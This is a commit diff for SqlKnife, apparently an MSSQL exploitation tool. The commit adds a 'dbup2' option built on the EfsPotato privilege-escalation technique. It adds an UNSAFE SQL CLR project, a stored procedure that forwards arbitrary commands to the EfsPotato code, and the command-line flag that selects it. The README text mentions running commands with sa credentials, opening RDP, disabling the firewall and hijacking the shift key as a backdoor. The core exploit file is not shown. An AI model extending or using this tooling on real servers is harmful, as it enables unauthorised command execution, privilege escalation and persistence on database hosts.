新加入dbup2功能，本质是zcgonvh的EfsPotato项目

EfsPotato/EfsPotato.sqlproj

@@ -0,0 +1,73 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <Name>EfsPotato</Name>
+    <SchemaVersion>2.0</SchemaVersion>
+    <ProjectVersion>4.1</ProjectVersion>
+    <ProjectGuid>{4836d6a4-f807-4e6a-887d-409bf1480017}</ProjectGuid>
+    <DSP>Microsoft.Data.Tools.Schema.Sql.Sql100DatabaseSchemaProvider</DSP>
+    <OutputType>Database</OutputType>
+    <RootPath>
+    </RootPath>
+    <RootNamespace>EfsPotato</RootNamespace>
+    <AssemblyName>EfsPotato</AssemblyName>
+    <ModelCollation>1033, CI</ModelCollation>
+    <DefaultFileStructure>BySchemaAndSchemaType</DefaultFileStructure>
+    <DeployToDatabase>True</DeployToDatabase>
+    <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
+    <TargetLanguage>CS</TargetLanguage>
+    <AppDesignerFolder>Properties</AppDesignerFolder>
+    <SqlServerVerification>False</SqlServerVerification>
+    <IncludeCompositeObjects>True</IncludeCompositeObjects>
+    <TargetDatabaseSet>True</TargetDatabaseSet>
+    <GenerateCreateScript>True</GenerateCreateScript>
+    <PermissionSet>UNSAFE</PermissionSet>
+    <TargetFrameworkProfile />
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <OutputPath>bin\Release\</OutputPath>
+    <BuildScriptName>$(MSBuildProjectName).sql</BuildScriptName>
+    <TreatWarningsAsErrors>False</TreatWarningsAsErrors>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <DefineDebug>false</DefineDebug>
+    <DefineTrace>true</DefineTrace>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <OutputPath>bin\Debug\</OutputPath>
+    <BuildScriptName>$(MSBuildProjectName).sql</BuildScriptName>
+    <TreatWarningsAsErrors>false</TreatWarningsAsErrors>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <DefineDebug>true</DefineDebug>
+    <DefineTrace>true</DefineTrace>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup>
+    <VisualStudioVersion Condition="'$(VisualStudioVersion)' == ''">11.0</VisualStudioVersion>
+    <!-- Default to the v11.0 targets path if the targets file for the current VS version is not found -->
+    <SSDTExists Condition="Exists('$(MSBuildExtensionsPath)\Microsoft\VisualStudio\v$(VisualStudioVersion)\SSDT\Microsoft.Data.Tools.Schema.SqlTasks.targets')">True</SSDTExists>
+    <VisualStudioVersion Condition="'$(SSDTExists)' == ''">11.0</VisualStudioVersion>
+  </PropertyGroup>
+  <Import Condition="'$(SQLDBExtensionsRefPath)' != ''" Project="$(SQLDBExtensionsRefPath)\Microsoft.Data.Tools.Schema.SqlTasks.targets" />
+  <Import Condition="'$(SQLDBExtensionsRefPath)' == ''" Project="$(MSBuildExtensionsPath)\Microsoft\VisualStudio\v$(VisualStudioVersion)\SSDT\Microsoft.Data.Tools.Schema.SqlTasks.targets" />
+  <ItemGroup>
+    <Folder Include="Properties" />
+  </ItemGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="SqlStoredProcedure1.cs" />
+    <Compile Include="EfsPotato.cs" />
+    <Compile Include="RowUtils.cs" />
+  </ItemGroup>
+</Project>

EfsPotato/RowUtils.cs

@@ -0,0 +1,43 @@
+using Microsoft.SqlServer.Server;
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.Data;
+using System.Text;
+
+namespace EfsPotato
+{
+    class RowUtils
+    {
+        static public void SendAllRow(ArrayList alltext)
+        {
+
+            string[] temparry = (string[])alltext.ToArray(typeof(string));
+            SqlDataRecord rec = new SqlDataRecord(new SqlMetaData[] {
+                new SqlMetaData("output",SqlDbType.Text,-1)
+            });
+            SqlContext.Pipe.SendResultsStart(rec);
+            for (int i = 0; i < temparry.Length; i++)
+            {
+                rec.SetSqlString(0, temparry[i]);
+                SqlContext.Pipe.SendResultsRow(rec);
+            }
+
+            SqlContext.Pipe.SendResultsEnd();
+
+        }
+        static public void SendOneRow(string text)
+        {
+
+            SqlDataRecord rec = new SqlDataRecord(new SqlMetaData[] {
+                new SqlMetaData("output",SqlDbType.Text,-1)
+            });
+            SqlContext.Pipe.SendResultsStart(rec);
+            rec.SetSqlString(0, text);
+            SqlContext.Pipe.SendResultsRow(rec);
+            SqlContext.Pipe.SendResultsEnd();
+
+        }
+
+    }
+}

EfsPotato/SqlStoredProcedure1.cs

@@ -0,0 +1,16 @@
+using System;
+using System.Data;
+using System.Data.SqlClient;
+using System.Data.SqlTypes;
+using Microsoft.SqlServer.Server;
+
+public partial class StoredProcedures
+{
+    [Microsoft.SqlServer.Server.SqlProcedure]
+    public static void EfsPotatoCmd(string cmd)
+    {
+        // 在此处放置代码
+        EfsPotato.EfsPotato.orgMain(cmd);
+
+    }
+}

PotatoInSQL/Program.cs

@@ -184,7 +184,7 @@ public static void OriginMain(string cmd)
                     sendrow(System.Text.Encoding.Default.GetString(outBytes));
 
 
-                }
+                    }
                     CloseHandle(out_read);
 
 

README.md

@@ -61,7 +61,7 @@ SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123  --oacreate -c calc.ex
 
 ![Snipaste_2021-08-03_10-56-34](img/Snipaste_2021-08-03_10-56-34.png)
 
-### 开RDP，关防火墙加规则（开RDP时自动加），装shift后门
+### 开RDP，关防火墙加规则（开RDP时自动加），劫持shift键
 
 权限足够的前提下，基于注册表的操作
 

SqlKnife.sln

@@ -11,6 +11,8 @@ Project("{00D1A9C2-B5F0-4AF3-8072-F6C62B433612}") = "SqlCmdExec", "SqlCmdExec\Sq
 EndProject
 Project("{00D1A9C2-B5F0-4AF3-8072-F6C62B433612}") = "DownLoadExec", "DownLoadExec\DownLoadExec.sqlproj", "{B8504434-68B2-47CE-A86F-B2FD434F77FD}"
 EndProject
+Project("{00D1A9C2-B5F0-4AF3-8072-F6C62B433612}") = "EfsPotato", "EfsPotato\EfsPotato.sqlproj", "{4836D6A4-F807-4E6A-887D-409BF1480017}"
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Any CPU = Debug|Any CPU
@@ -85,6 +87,24 @@ Global
 		{B8504434-68B2-47CE-A86F-B2FD434F77FD}.Release|x86.ActiveCfg = Release|Any CPU
 		{B8504434-68B2-47CE-A86F-B2FD434F77FD}.Release|x86.Build.0 = Release|Any CPU
 		{B8504434-68B2-47CE-A86F-B2FD434F77FD}.Release|x86.Deploy.0 = Release|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Debug|Any CPU.Deploy.0 = Debug|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Debug|x64.ActiveCfg = Debug|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Debug|x64.Build.0 = Debug|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Debug|x64.Deploy.0 = Debug|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Debug|x86.ActiveCfg = Debug|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Debug|x86.Build.0 = Debug|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Debug|x86.Deploy.0 = Debug|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Release|Any CPU.Build.0 = Release|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Release|Any CPU.Deploy.0 = Release|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Release|x64.ActiveCfg = Release|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Release|x64.Build.0 = Release|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Release|x64.Deploy.0 = Release|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Release|x86.ActiveCfg = Release|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Release|x86.Build.0 = Release|Any CPU
+		{4836D6A4-F807-4E6A-887D-409BF1480017}.Release|x86.Deploy.0 = Release|Any CPU
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

SqlKnife/SqlKnife.cpp

@@ -16,7 +16,7 @@ void printusage(char * filename) {
 
 		)" << endl;
 	cout << "SqlKnife v1.0 " << endl << "A mssql exploit tool in commandline." << endl;
-	cout << filename << " <-H host> <-P port> <-u username> <-p password> <-D dbname> <-c cmd> <--openrdp> <--shift> <--disfw> <--oacreate> <--clrcmd> <--clrdexec> <--xpcmd> <--dbup> <--fix> <--remove> <--3/--4>" << endl;
+	cout << filename << " <-H host> <-P port> <-u username> <-p password> <-D dbname> <-c cmd> <--openrdp> <--shift> <--disfw> <--oacreate> <--clrcmd> <--clrdexec> <--xpcmd> <--dbup> <--dbup2> <--fix> <--remove> <--3/--4>" << endl;
 
 
 }
@@ -57,6 +57,7 @@ int main(int argc, char** argv) {
 		{"remove",no_argument,NULL,10},
 		{"3",no_argument,NULL,11},
 		{"4",no_argument,NULL,12},
+		{"dbup2",no_argument,NULL,13},
 		{0,0,0,0}
 
 	};
@@ -108,6 +109,9 @@ int main(int argc, char** argv) {
 		case 12:
 			isdonet4 = true;
 			continue;
+		case 13:
+			method = ExecMethod::DBUP2;
+			continue;
 		case 'H':
 			host = optarg;
 			continue;

SqlKnife/stdfax.h

@@ -13,6 +13,6 @@ enum ExecMethod
 	OACREATE,
 	CLRCMD,
 	CLRDEXEC,
-	DBUP
-	//EXEASM
+	DBUP,
+	DBUP2
 };